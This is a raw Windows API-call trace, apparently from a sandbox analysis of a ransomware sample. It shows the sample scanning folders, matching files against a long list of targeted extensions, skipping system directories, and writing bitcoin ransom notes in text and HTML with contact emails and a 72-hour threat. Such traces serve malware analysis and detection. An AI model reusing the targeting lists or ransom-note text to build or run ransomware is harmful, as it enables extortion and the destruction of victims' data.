	[0170.428] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1
	[0170.428] lstrcmpW (lpString1="Pending.GRL", lpString2="..") returned 1
	[0170.428] lstrcmpW (lpString1="Pending.GRL", lpString2=".") returned 1
	[0170.428] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\MF\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\") returned="C:\\Users\\All Users\\Microsoft\\MF\\"
	[0170.429] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", lpString2="Pending.GRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL"
	[0170.429] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned 43
	[0170.429] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.429] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\mf\\pending.grl") returned 0x2b
	[0170.429] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.429] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\pending.grl", lpSrch="help_decrypt_your_files") returned 0x0
	[0170.429] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\mf\\pending.grl" | out: lpString1="c:\\users\\all users\\microsoft\\mf\\pending.grl") returned="c:\\users\\all users\\microsoft\\mf\\pending.grl"
	[0170.429] lstrlenW (lpString="c:\\users\\all users\\microsoft\\mf\\pending.grl") returned 43
	[0170.429] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.430] StrStrW (lpFirst=".grl", lpSrch=".") returned=".grl"
	[0170.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.430] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".grl") returned 0x0
	[0170.430] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 0
	[0170.430] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.431] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.433] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\MF" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF") returned="C:\\Users\\All Users\\Microsoft\\MF"
	[0170.433] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MF", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned="C:\\Users\\All Users\\Microsoft\\MF\\*.*"
	[0170.433] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.434] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.434] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\MF\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0170.434] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\mf\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.435] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.435] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.438] CloseHandle (hObject=0x384) returned 1
	[0170.438] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.439] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0170.440] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.440] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\mf\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.441] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.441] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.441] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0170.441] CloseHandle (hObject=0x384) returned 1
	[0170.442] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.442] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.442] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.442] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\MF\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0170.442] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\mf\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.448] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.448] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0170.451] CloseHandle (hObject=0x384) returned 1
	[0170.452] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.452] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.453] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0170.454] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.454] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\mf\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.454] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.455] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.455] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0170.455] CloseHandle (hObject=0x384) returned 1
	[0170.456] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\*.*" (normalized: "c:\\users\\all users\\microsoft\\mf\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f20f1b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.456] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned 35
	[0170.456] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.456] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\all users\\microsoft\\mf\\*.*") returned 0x23
	[0170.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.456] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="windows") returned 0x0
	[0170.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.457] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="boot") returned 0x0
	[0170.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.457] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="system volume information") returned 0x0
	[0170.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.457] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.458] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="temp") returned 0x0
	[0170.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.458] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="program files") returned 0x0
	[0170.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.458] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.458] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="appdata") returned 0x0
	[0170.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="application data") returned 0x0
	[0170.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="winnt") returned 0x0
	[0170.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="tmp") returned 0x0
	[0170.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="cache") returned 0x0
	[0170.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="webcache") returned 0x0
	[0170.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="inetcache") returned 0x0
	[0170.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="nvidia") returned 0x0
	[0170.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="packages") returned 0x0
	[0170.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="cookies") returned 0x0
	[0170.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="programdata") returned 0x0
	[0170.461] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.461] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.462] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f20f1b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.462] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.462] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Active.GRL", cAlternateFileName="")) returned 1
	[0170.462] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f1e920a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f1e920a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f20f1b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
